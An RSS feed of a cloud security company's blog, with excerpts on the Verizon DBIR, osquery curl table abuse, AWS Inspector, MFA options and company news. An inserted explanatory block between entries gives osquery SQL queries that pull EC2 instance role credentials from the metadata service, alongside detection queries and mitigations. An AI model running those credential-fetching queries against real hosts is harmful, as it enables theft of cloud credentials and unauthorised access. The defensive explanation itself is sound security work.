Tenchi Security (EN)
At Tenchi Security, we provide consulting services and products to help your organization embrace the benefits of the cloud in a secure and compliant fashion. Our work helps security move from being a blocker to being an enabler of the business teams' pursuit of the flexibility, scalability, automation and savings the cloud offers.
https://www.tenchisecurity.com/
Two Main Takeaways from the 2020 DBIR for Cloud Security
Sat, 23 May 2020 04:54:43 -0700
https://www.tenchisecurity.com/blog/two-main-takeaways-from-the-2020-dbir-for-cloud-security
https://www.tenchisecurity.com/blog/two-main-takeaways-from-the-2020-dbir-for-cloud-security<p>If you've been hiding under a rock for the last 13 years, let me share with you that the <a target="_blank" href="https://enterprise.verizon.com/resources/reports/dbir/">Verizon Data Breach Investigations Report</a> (DBIR) is the longest-running data-driven report on the state of information security. It is highly respected because of its sound statistical methodology, the quality of the teams behind it over the years, and the uniquely rich data set contributed by Verizon and the many organizations that contribute to it.</p><p>I am very passionate about the need for data-driven decisions in information security. So much of what passes for wisdom in our industry reminds me of the pre-scientific era of medicine. We need well-written, properly executed studies built on good data sets, like the DBIR and the many reports published by others such as the enlightened folk at <a target="_blank" href="https://www.cyentia.com/">Cyentia Institute</a>. These reports are a breath of fresh air and give me hope that we can make better decisions going forward.</p><p>In this post, I will highlight my own personal and subjective selection of the two most relevant lessons for cloud security in the recently published 2020 edition of the DBIR.</p><h3><p>The Reign of Pain Falls Mainly on the Control Plane</p></h3><p>There is a clear theme in the 2020 DBIR around the use of illegitimately obtained credentials. So let's see what the DBIR has to say about how often stolen or lost credentials were used in the actual breaches it studied:</p><p>One of the most relevant things about cloud security is that there is an entirely new attack surface made up of the cloud service provider's APIs, commonly called the <em>control plane</em>.
Unlike the management interfaces of on-premises IT infrastructure, the control plane is Internet-accessible, shared by all customers, and widely known and documented: an attacker holding valid credentials needs no network foothold to use them.</p><p>This clearly underscores how critical the issue of...<a href="https://www.tenchisecurity.com/blog/two-main-takeaways-from-the-2020-dbir-for-cloud-security">Read More</a>
Abusing the osquery "curl" table for pivoting into cloud environments
Tue, 12 May 2020 15:17:07 -0700
https://www.tenchisecurity.com/blog/abusing-the-osquery-curl-table-for-pivoting-into-cloud-environments
https://www.tenchisecurity.com/blog/abusing-the-osquery-curl-table-for-pivoting-into-cloud-environments<h3><p>About osquery</p></h3><p>IT professionals often need to answer questions about what is happening in the operating systems of the fleet they manage or secure, for purposes such as performance management, software inventory, threat hunting and incident response. To solve this problem with an easy-to-use interface, Facebook created <a target="_blank" href="https://osquery.io">osquery</a> in 2014 and published it as open source software.</p><p>osquery works by exposing relational tables (some generic, others OS-specific) that can be queried with SQL to inspect live information from the hosts in your fleet. Obtaining the same information by other means requires complex and varied collection and normalization methods, so this simple model is a huge win.</p><p>There are currently 257 tables that can be queried, listed at <a target="_blank" href="https://osquery.io/schema/">https://osquery.io/schema/</a>. The combination of tables and queries lets IT and security professionals answer a variety of questions, which can then be monitored continuously through scheduled queries, with optional alerts when particular values are found or when certain values change.</p><p>One big underlying assumption, though, is that osquery takes great care not to let anyone obtain potentially confidential data from the hosts or environment it runs on. For example, osquery deliberately does not allow reading arbitrary files by default.
This is a great principle to follow.</p><p>It is also important to note that, since it is open source, osquery is widely embedded, openly or behind the scenes, in management and security offerings such as those in the MDR, MSSP and EDR categories.</p><h3><p>Exploiting the curl table</p></h3><p>This is where the curl table in osquery comes in. Querying this table allows you to perform a variety of...<a href="https://www.tenchisecurity.com/blog/abusing-the-osquery-curl-table-for-pivoting-into-cloud-environments">Read More</a>
Using Amazon AWS Inspector
Wed, 19 Feb 2020 10:59:30 -0800
https://www.tenchisecurity.com/blog/using-amazon-aws-inspector
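To make the pivot described in the osquery curl table post above concrete, the queries below are an added example; they are not code from the Tenchi post or from the osquery project. They assume osquery running on an AWS EC2 instance that has an instance role attached. The 169.254.169.254 address and the iam/security-credentials/ path are AWS's documented instance metadata service (IMDS) endpoints, example-role is a hypothetical placeholder, and the curl, osquery_schedule and osquery_registry tables and the --disable_tables flag are standard osquery features.

```sql
-- Added example, not code from the Tenchi post or the osquery project.
-- 1) Attacker's view: the curl table makes osquery fetch a URL on the host's
--    behalf and returns the response body in the `result` column. On an EC2
--    instance the link-local IMDS answers IMDSv1 requests without any
--    authentication, so listing the instance role needs nothing but a query.
--    (Address and path are AWS-documented; `example-role` is a placeholder.)
SELECT url, response_code, bytes, result
FROM curl
WHERE url = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/';

-- Fetch the role's temporary credentials (AccessKeyId, SecretAccessKey,
-- Token) as JSON; this row is enough to call the AWS control plane from
-- anywhere on the Internet until the credentials expire.
SELECT result AS role_credentials_json
FROM curl
WHERE url = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/example-role';

-- 2) Defender's view: list scheduled queries on this host that touch the
--    curl table at all. Ad hoc queries pushed through the distributed plugin
--    do not appear here and must be reviewed in the distributed query logs.
SELECT name, query, interval, last_executed
FROM osquery_schedule
WHERE query LIKE '%curl%';

-- 3) Verify the mitigation: after starting osqueryd with --disable_tables=curl
--    (an osquery command-line flag), this query returns no row because the
--    table is no longer registered.
SELECT name, active
FROM osquery_registry
WHERE registry = 'table' AND name = 'curl';
```

The first two queries return what any operator, or anyone able to push queries to the fleet through an MDR or EDR product built on osquery, gets back: role credentials in a single row, with no file read and no shell spawned on the host, which is why the curl table sits uneasily next to the no-arbitrary-file-reads principle above. Disabling the table removes the capability outright. Requiring IMDSv2 on the instance, which demands a PUT to obtain a session token before any metadata GET, is an independent layer of defense on the assumption that the curl table only issues GET requests, which is what its method column reports.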
https://www.tenchisecurity.com/blog/using-amazon-aws-inspector<h3><p>What is Amazon Inspector?</p></h3><p><a target="_blank" href="https://aws.amazon.com/inspector/">Amazon Inspector</a> is an AWS service that runs compliance and best-practice checks and looks for known vulnerabilities in the software installed on your instances' operating systems. It requires an agent to be installed on your cloud instances (the agent-based service described here is what AWS now calls Amazon Inspector Classic). Inspector assessments help you find excessively permissive access and vulnerabilities in your EC2 instances. Checks are grouped into rules packages, each a set of pre-defined rules, in four categories.</p><p>Inspector classifies its findings into four severity levels:</p><p><b>High</b> – A security issue that can result in a compromise of the confidentiality, integrity or availability of information within your assessment target. AWS recommends treating it as an emergency and remediating it immediately.</p><p><b>Medium</b> – A security issue of the same nature that AWS recommends fixing at the next possible opportunity, for example during your next service update.</p><p><b>Low</b> – A security issue of the same nature that AWS recommends fixing as part of one of your future service updates.</p><p><b>Informational</b> – A particular security configuration detail of your assessment target.
Based on your business and organization goals, you can either simply make note of this information or use it to improve the security of your assessment target.</p><h3><p>Rules Packages</p></h3><ol><li><p><strong>CIS Benchmark</strong><br>The CIS Security Benchmarks program provides well-defined, unbiased, consensus-based industry best practices to help organizations assess and improve their...<a href="https://www.tenchisecurity.com/blog/using-amazon-aws-inspector">Read More</a></p></li></ol>
Tenchi Security announces cloud infrastructure security training course
Mon, 16 Dec 2019 11:41:16 -0800
https://www.tenchisecurity.com/blog/tenchi-security-announces-cloud-infrastructure-security-training-course
https://www.tenchisecurity.com/blog/tenchi-security-announces-cloud-infrastructure-security-training-course<p>Most infrastructure, operations, development and security teams are struggling to keep up with the pace of change in IT environments. Nowhere is this more true than in the cloud, given the frantic pace of new functionality and the race to migrate and meet business goals. The outcome has been a number of incidents and data leaks caused by the incorrect use of cloud infrastructure. In line with its mission to help organizations use the public cloud securely, Tenchi Security is proud to announce the first open class of its <a target="_blank" href="https://uploads.strikinglycdn.com/files/718fb597-4bf6-46b5-93d5-d77685aa1c67/AWS%20Cloud%20Infrastructure%20Security%20A4%20en_US.pdf?id=205796">AWS Cloud Infrastructure Security course</a>.</p><p>A Gartner study projects that <a target="_blank" href="https://www.gartner.com/smarterwithgartner/is-the-cloud-secure/">through 2025, 90% of the organizations that fail to control public cloud use will inappropriately share sensitive data</a>. Most leaks will happen for lack of proper expertise in securely configuring, operating, developing and designing infrastructure and applications in cloud environments. It is only natural that teams used to on-premises environments need proper training before they can use something as disruptive as the public cloud well. There are a variety of tools, techniques and best practices that can avoid or mitigate these issues, but they will only be used by teams that have the requisite cloud security knowledge.</p><p>The <strong>AWS Cloud Infrastructure Security</strong> course was developed precisely to address this knowledge gap. It aims to empower your development, operations, architecture and security teams to apply sound security practices in their daily work.
This is a foundational course covering the secure use of the main AWS Infrastructure as a Service (IaaS) offerings. Its content is appropriate for all technical professionals who will have...<a href="https://www.tenchisecurity.com/blog/tenchi-security-announces-cloud-infrastructure-security-training-course">Read More</a>
AWS Two Factor Authentication - what are the differences between SSO and IAM?
Thu, 14 Nov 2019 13:27:08 -0800
https://www.tenchisecurity.com/blog/aws-two-factor-authentication-what-are-the-differences-between-sso-and-iam
https://www.tenchisecurity.com/blog/aws-two-factor-authentication-what-are-the-differences-between-sso-and-iam<p>One of the most challenging topics in AWS security is controlling access to the management APIs, also known as the control plane. Cloud security incidents are frequently caused by misconfigured privileges, ranging from the ubiquitous world-readable S3 bucket to the use of ill-gotten credentials for users or roles with excessive permissions.</p><p>The <a target="_blank" href="https://docs.aws.amazon.com/pt_br/IAM/latest/UserGuide/introduction.html">IAM</a> service is the foundation of AWS security, since it controls authentication and authorization for access to the AWS APIs. It supports multi-factor authentication (MFA) and granular policies, and it is integrated with the entire AWS service ecosystem.</p><p>For organizations with non-trivial AWS environments, though, it is imperative to segregate the environment into separate AWS accounts. Segregation allows better access management and contains the blast radius of any security incident. This approach creates a challenge, since IAM users are scoped to a single AWS account. The <a target="_blank" href="https://aws.amazon.com/answers/security/aws-secure-account-setup/">best practice</a> is to use an identity federation service to grant controlled access to the different AWS accounts, avoiding the creation of a huge number of IAM users and long-lived credentials.</p><p>It was precisely to support this federation that <a target="_blank" href="https://aws.amazon.com/single-sign-on/">AWS Single Sign-On (SSO)</a> was created.
It allows the use of an internal user directory, or integration with a cloud-based or on-premises Active Directory, to grant users controlled access to a variety of AWS accounts.</p><p>Until recently, the only way to use SSO with MFA was to integrate it with an Active Directory environment configured to enforce MFA. In late October, though, ...<a href="https://www.tenchisecurity.com/blog/aws-two-factor-authentication-what-are-the-differences-between-sso-and-iam">Read More</a>
Tenchi Security acquires BlueOps
Mon, 14 Oct 2019 08:22:35 -0700
https://www.tenchisecurity.com/blog/tenchi-security-acquires-blueops
https://www.tenchisecurity.com/blog/tenchi-security-acquires-blueops<p>BlueOps, a training and consulting company, was acquired today by Tenchi Security, a cloud security company. Its services will be incorporated into the Tenchi Security portfolio of cloud-centric security services.</p><p>The <a target="_blank" href="https://www.isc2.org/resource-center/reports/cloud-security-report">(ISC)<sup>2</sup> 2019 Cloud Security Report</a> shows that a lack of expertise and training in internal teams is perceived by survey respondents as the greatest barrier to the adoption of cloud security tools at enterprises, cited in 41% of responses. It also shows that training and certification of internal staff is the top corrective measure companies plan to adopt, with 51% of responses.</p><p>This is a clear sign that the learning curve of cloud technologies presents a serious challenge to organizations and teams used to operating and securing on-premises environments. A staggering number of cloud security incidents are caused by misconfigurations that could have been avoided, or at least mitigated, by properly trained development, IT and security teams.</p><p>"We are seeing a strong market demand for services geared towards security monitoring and incident response in cloud environments", says Alexandre Sieira. He continues: "the intellectual property and amazing talent we are bringing in as part of this acquisition will be essential in meeting this demand with the desired level of quality".</p><p>BlueOps was founded in 2017 by Rodrigo Montoro and Felipe Espósito, experienced security professionals and researchers with an international profile. Their aim was to create quality content and provide training in defensive information security.
Both Montoro and Espósito will join the Tenchi Security team after the acquisition, leading cloud security research and training activities.</p><p>Felipe Espósito graduated in Information Technology at UNICAMP and has a master's degree in...<a href="https://www.tenchisecurity.com/blog/tenchi-security-acquires-blueops">Read More</a>
Tenchi Security expands executive team with Dani Dilkin
Wed, 09 Oct 2019 06:21:29 -0700
https://www.tenchisecurity.com/blog/tenchi-security-expands-executive-team-with-dani-dilkin
https://www.tenchisecurity.com/blog/tenchi-security-expands-executive-team-with-dani-dilkin<p>Dani Dilkin is joining Tenchi Security, a cloud security startup founded by Alexandre Sieira, to lead the services delivery practice as a Senior Partner.</p><p>His mission will be to bring cloud security initiatives to the market, to management teams and to boards in a way that is tightly aligned with business objectives and strategy.</p><p>Dilkin is a seasoned information security executive with over 20 years of experience. He recently led the planning, sales and service delivery of the cyber security practices of Kroll and Deloitte in Brazil. Before that, he worked at NET, Terra, CIPHER and Getronics.</p><p>Dilkin was one of the pioneers of payment card industry security in Brazil, was one of the first professionals in the country to be certified as a PCI QSA, and took part in the compliance efforts of the country's leading payment industry players. In addition, he is known for his deep expertise in risk assessment and management, compliance, crisis management, incident response, and complex project management and delivery at large enterprises across different verticals.
Dilkin is also a member of the Brazilian Association for Internet of Things (ABINC).</p><p>"Dani has ample experience in structuring and leading sales and consulting teams in the information security market, and his joining the company will be instrumental in helping us meet the strong demand we are getting from the market", says Alexandre Sieira, founder of Tenchi Security.</p><p><a target="_blank" href="https://www.gartner.com/en/newsroom/press-releases/2019-04-02-gartner-forecasts-worldwide-public-cloud-revenue-to-g">Gartner projects that the public cloud market will reach $214 billion US dollars in 2019, and that the year-over-year growth for Infrastructure as a Service (IaaS) will be over 27%.</a> This is a reflection of the growing adoption of cloud services by companies of all sizes and verticals aiming to rationalize costs and gain operational flexibility, agility and...<a href="https://www.tenchisecurity.com/blog/tenchi-security-expands-executive-team-with-dani-dilkin">Read More</a>